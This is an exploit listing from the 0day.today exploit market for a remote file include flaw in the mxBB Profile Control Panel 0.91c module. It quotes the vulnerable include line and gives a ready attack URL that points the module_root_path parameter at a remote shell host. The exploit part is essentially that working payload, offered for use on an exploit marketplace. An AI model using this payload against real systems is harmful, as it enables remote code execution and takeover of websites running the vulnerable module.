[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

mxBB Module Profile CP 0.91c Remote File Include Vulnerability

Author
bd0rk
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-1244
Category
web applications
Date add
09-12-2006
Platform
unsorted
==============================================================
mxBB Module Profile CP 0.91c Remote File Include Vulnerability
==============================================================



###############################################################################
##                                                                           ##
## mxBB Module Profile Control Panel 0.91c Remote File Include Vulnerability ##
##                                                                           ##
## Bugfound3R: bd0rk || SOH-Crew                                             ##
##                                                                           ##
## Greetz: Lu7k, TheJT, Natok                                                ##
##                                                                           ##
###############################################################################


==> Vulnerable Code in profilcp_constants.php <==

Code: include_once($module_root_path . 'includes/lang_extend_mac.'.$phpEx);

Usage: http://[y0uRSiTe]/[direct0ry]/includes/profilcp_constants.php?module_root_path=http://Sh3LL?



#  0day.today [2024-11-16]  #